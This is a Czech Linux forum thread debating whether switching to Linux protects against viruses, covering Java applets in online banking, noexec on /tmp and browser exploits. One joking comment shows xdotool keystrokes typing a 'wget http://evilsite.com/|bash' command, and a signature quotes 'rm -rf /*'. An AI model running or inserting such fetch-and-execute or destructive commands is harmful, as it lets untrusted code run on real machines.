Portál AbcLinuxu, 18. května 2025 02:00

Nástroje: Začni sledovat (2) ?Zašle upozornění na váš email při vložení nového komentáře.

Vložit další komentář
FrostyX avatar 13.7.2012 13:24 FrostyX | skóre: 27 | blog: Frostyho_blog | Olomouc
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
Odpovědět | Sbalit | Link | Blokovat | Admin
V článku o DE/WM jsem si všiml malinkého překlepu. "Awesome" se píše s "w" nikoli "v". ;-)
FrostyX.cz | 1984 was not supposed to be an instruction manual.
Ruža Becelin avatar 13.7.2012 13:49 Ruža Becelin | skóre: 40 | blog: RuzaBecelinBlog
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
Zavirovaný počítač je vždy důvod ke smutku. Pokud se chcete takových starostí zbavit, můžete si pročíst openMagazin, který se tomuto tématu věnuje.

Hmmm.

Bejvavalo :-(
MaT avatar 13.7.2012 15:27 MaT | skóre: 28
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
No a co jako? On dneska ještě někdo má ve výchozím stavu povolené Java Applety? Resp. on to ještě někdo dneska používá? (Minecraft se nepočítá... :-)
Open source software for open minded people. :-)
13.7.2012 15:31 Rovano
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
Nevím jestli myslíte to samé, ale některé banky to striktně vyžadují.
Jendа avatar 13.7.2012 15:49 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
Tak to povolím jenom té bance, ne?

(Nejlepší by stejně bylo od takové banky odejít. V IB není nic, co by nešlo vyřešit čistým HTML, ale appletem jo. Ukazuje to jen na jejich neschopnost.)
13.7.2012 18:37 Filip Jirsák | skóre: 68 | blog: Fa & Bi
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
Pokud bankovnictví používá elektronický podpis, jiná možnost než nějaký plugin není. Navíc zákaz Java appletů řeší jen tohoto konkrétního trojského koně, ale na jiné fungovat nebude. Když uživatel odkliká spuštění neznámého softwaru, odkliká to tentokrát v Javě, příště ve Flashi a přespříště jako plugin do prohlížeče. Takovému uživateli byste musel odinstalovat webový prohlížeč, aby se nemohl přes web nakazit...
Jendа avatar 13.7.2012 19:21 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
Pokud bankovnictví používá elektronický podpis, jiná možnost než nějaký plugin není.
Takže já si stáhnu z webu internetbankingu applet, spustím ho, dám mu soukromý klíč a něco v něm podepíšu? Jaký to má smysl? Pokud je kompromitovaný web, bude kompromitovaný i stahovaný applet.
13.7.2012 19:26 Filip Jirsák | skóre: 68 | blog: Fa & Bi
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
Elektronický podpis nikdy nechrání podepisujícího, vždy chrání příjemce zprávy -- ten jím může dokázat, že zprávu skutečně potvrdil ten, kdo je podepsán. Takže v případě banky by elektronický podpis chránil banku, měla by elektronicky podepsaný příkaz k úhradě.

Navíc to o kompromitaci appletu není pravda, něco jiného je napadnout web, něco jiného je podepsat applet důvěryhodným certifikátem.
Jendа avatar 13.7.2012 19:36 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
Pokud má být cílem, aby banka mohla na moji námitku „tuhle transakci jsem nezadával“ vytáhnout soubor „potvrzuji tuto transakci, elektronicky podepsán Jan Hrach,“ pak není možné, aby tento podpis vznikal v nějakém bytecodovém blobu dodaném bankou, ve kterém banka může mít backdoor.
pavlix avatar 14.7.2012 15:35 pavlix | skóre: 54 | blog: pavlix
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
Ale je :). Bankovní bezpečnost prakticky nikdy nebere v potaz zákazníka. Postup v tomto případě je následující:

1) Škemrat u banky, aby transakci přezkoumala.

2) Popohánět banku, aby transakci opravdu přeskoumala.

Mezitím si nějak zajistit živobytí.

3) Vyhrožovat bance právníkem.

4) Sehnat si dobrého právníka.
Já už tu vlastně ani nejsem. Abclinuxu umřelo.
13.7.2012 16:28 Nikola Pajkovský | skóre: 16
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
noexec flag na /tmp
Save the whales. Feed the hungry. Free the mallocs
Jendа avatar 13.7.2012 16:37 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
Nejde to různými kreativními způsoby obejít?
13.7.2012 16:59 Mrkva | skóre: 22 | blog: urandom
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
Dávno ne: 
mrkva@destiny:~$ cd /tmp
mrkva@destiny:/tmp$ su
Heslo: 
root@destiny:/tmp# mkdir noexec
root@destiny:/tmp# chmod 777 noexec/
root@destiny:/tmp# mount -t tmpfs tmpfs noexec/ -o noexec
root@destiny:/tmp# exit
mrkva@destiny:/tmp$ cd noexec
mrkva@destiny:/tmp/noexec$ cp /usr/bin/id .
mrkva@destiny:/tmp/noexec$ ./id
bash: ./id: Permission denied
mrkva@destiny:/tmp/noexec$ /lib64/ld-linux-x86-64.so.2 ./id
./id: error while loading shared libraries: ./id: failed to map segment from shared object: Operation not permitted
Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
Jendа avatar 13.7.2012 17:10 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
No dobře, ale stejně nevím, čemu to pomůže. Když už útočník může zapisovat a spouštět kód z /tmp, tak může zapisovat taky třeba do .bashrc. Nebo zrovna tenhle konkrétní exploit je závislý na /tmp?
little.owl avatar 14.7.2012 23:12 little.owl | skóre: 22 | blog: Messy_Nest | Brighton/Praha
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
Když už útočník může zapisovat a spouštět kód z /tmp, tak může zapisovat taky třeba do .bashrc.
Zajimalo by mne, co na to SELinux.
A former Red Hat freeloader.
Jendа avatar 14.7.2012 23:20 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce 
xdotool key Alt-F2

xdotool type xterm [RETURN]

xdotool type "wget http://evilsite.com/|bash - ; logout"
14.7.2012 23:20 Mrkva | skóre: 22 | blog: urandom
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
A nebo si přes Xka odposlechne rootovské heslo :)
I invoke.
Tak takhle jsem se dlouho nenasmál
Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
16.7.2012 08:53 melkors | skóre: 13 | blog: kdo_chce_kam
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
Nekteri musi pouzivat iLO :-(
FrostyX avatar 13.7.2012 13:50 FrostyX | skóre: 27 | blog: Frostyho_blog | Olomouc
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
A screenshot v kapitole o Gnome, není to unity ?
FrostyX.cz | 1984 was not supposed to be an instruction manual.
Jendа avatar 13.7.2012 15:50 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
Odpovědět | Sbalit | Link | Blokovat | Admin
No, absence virů je dána jenom rozšířením platformy, že.
kyknos avatar 13.7.2012 16:08 kyknos | skóre: 18 | blog: Quid novi? | Ranša Rosa
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
To si nemyslím. Rozhodně biologická analogie tak úplně nefunguje. Je to jen jeden z mnoha faktorů.
So the Nationalists and the Socialists have the same policy on Brexit. They should get together and form a...
Jendа avatar 13.7.2012 16:12 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
Jak se dostává dneska malware nejčastěji do počítačů? Přiznám se, že trendy moc nesleduju, ale chodí mi spamy, ve kterých jsou očividně exploity na Javu/Flash/prohlížeč a pak ještě občas odkazy na .exe soubory. To je na Linuxu realizovatelné úplně stejně. Autoruny už nefrčí, ale viděl jsem nějaký buffer overflow při vytváření náhledů ve filemanageru. To shodou okolností nedávno bylo v Nautilu taky a libpng už taky leccos pamatuje.
kyknos avatar 13.7.2012 16:25 kyknos | skóre: 18 | blog: Quid novi? | Ranša Rosa
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
Ani já to nesleduju, ale řekl bych, že jeden ze zásadních rozdílů bude v poučenosti uživatelů různých platforem. Stejně tak jako v rozšířenosti Flashe zmíněného na různých platformách.
So the Nationalists and the Socialists have the same policy on Brexit. They should get together and form a...
D.A.Tiger avatar 13.7.2012 16:31 D.A.Tiger | skóre: 8 | Brno
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
Nemyslím, že by to bylo o tom, že by uživatelé nebyly poučeni. Spíš o tom, že ve Widlích se naučily slepě důvěřovat reklamě a systému. "Mám antivirus, firewalll, nejnovější aktualizace, tak co?" A už nesledují co jim třeba na FB servírují tvůrci nejrůznějších super COOL debilních aplikací....

A mám strach kdy se k tomu dohrabem taky. Začínám podobné móresy už trochu větřit i v našich binárních krajinách....
Radost z toho, že někdo objeví něco nového, je omyl starý 6000 let... (Jean Paul) | anthill inside
Jendа avatar 13.7.2012 16:38 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
Ani já to nesleduju, ale řekl bych, že jeden ze zásadních rozdílů bude v poučenosti uživatelů různých platforem.
To je. Ale pokud zmíněný OpenMagazin převede uživatele, kteří měli na Windows problém (a jsou tedy nepoučení) na Linux, jak si pomůžou?
Stejně tak jako v rozšířenosti Flashe zmíněného na různých platformách.
Flash má i spousta linuxáků a dá se očekávat, že BFU přecházející z Windows ho bude chtít taky.
kyknos avatar 13.7.2012 16:52 kyknos | skóre: 18 | blog: Quid novi? | Ranša Rosa
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
no myslím, že ty převody jsou velmi selektivní - zcela nepoučený uživatel má windows, linux obvykle instalují ti poučení (to, že je to vůbec napadne, znamená, že o tom přemýšlí a čtou, alespoň zatím)
So the Nationalists and the Socialists have the same policy on Brexit. They should get together and form a...
murzim avatar 13.7.2012 20:49 murzim | skóre: 12 | blog: murzim
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
Odpovědět | Sbalit | Link | Blokovat | Admin
Zavirovaný počítač je otázkou ignorace ze strany uživatele... Linux je zranitelný také... a není řešením...
Bůh stvořil člověka a opice vznikly evolucí "o pár let později" z blbých lidí.
vain avatar 14.7.2012 08:15 vain | skóre: 16
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
To není pravda, dostal jsem virus (3 roky zpět) jen navštívením (ani jsem nemusel na nic kliknout) stránky xzone.cz v aktualizované Opeře a aktualizovaných Windows XP i s aktualizovaným antivirovým programem. Následky katastrofální, skončily reinstalací OS.

Takže to evidentně o ignoranci uživatele není.
If the only choice you've got is to do the wrong thing, then it's not really the wrong thing, it's more like fate.
Jendа avatar 14.7.2012 11:02 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
Flash? Java? 0day? Browsení webu prostě není bezpečné, bohužel jiná použitelná možnost omezení prohlížeče než virtualizace (se značným výkonovým propadem) na Linuxu není, nepočítáme-li Links.
14.7.2012 11:09 Filip Jirsák | skóre: 68 | blog: Fa & Bi
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
Flash? Java?
Kdy byla naposledy ve Flashi nebo v Javě bezpečnostní chyba umožňující bez souhlasu uživatele spustit kód mimo pískoviště? Kolik takových chyb bylo celkem?
Jendа avatar 14.7.2012 11:18 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
Nevím, dal jsem do Google flash remote exploit a podíval se na první odkaz. Tady je další a ještě jedna.
14.7.2012 11:24 Filip Jirsák | skóre: 68 | blog: Fa & Bi
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
Takže ve Flashi 3 za posledních 6 let, v Javě pokud vím 1 za celou dobu existence. Myslím, že v samotných prohlížečích těch chyb bylo daleko víc.
Jendа avatar 14.7.2012 11:41 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
vain: Vyownovali mě přes plně aktualizovanou Operu na aktualizovaných XPčkách.

Jenda: Mohl to být exploit na Flash nebo Javu nebo zeroday na Operu.

FJ: Takové exploity byly za posledních 6 let jenom 4.

???
14.7.2012 12:00 Filip Jirsák | skóre: 68 | blog: Fa & Bi
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
Asi to bude chtít trochu si ujasnit pojmy.
Flash? Java? 0day?
Mohl to být exploit na Flash nebo Javu nebo zeroday na Operu.
V té první větě není nic o Opeře. V té druhé jste to sice rozepsal, ale pořád to nedává smysl. Myslel jste tedy tohle?
Mohl to být zero day exploit na Flash, Javu nebo na Operu.
D.A.Tiger avatar 14.7.2012 13:36 D.A.Tiger | skóre: 8 | Brno
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce
Ono se říká, že otevřený systém je tak bezpečný, jak schopný je ten, kdo se o něj stará. Uzavřený systém (rozuměj propertiální) je prý natolik bezpečný nakolik dovolí výrobce.

Ale tak jako tak - útočník/virus se k vám musí nějak vždycky dostat...
Radost z toho, že někdo objeví něco nového, je omyl starý 6000 let... (Jean Paul) | anthill inside

Založit nové vláknoNahoru

Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

ISSN 1214-1267, (c) 1999-2007 Stickfish s.r.o.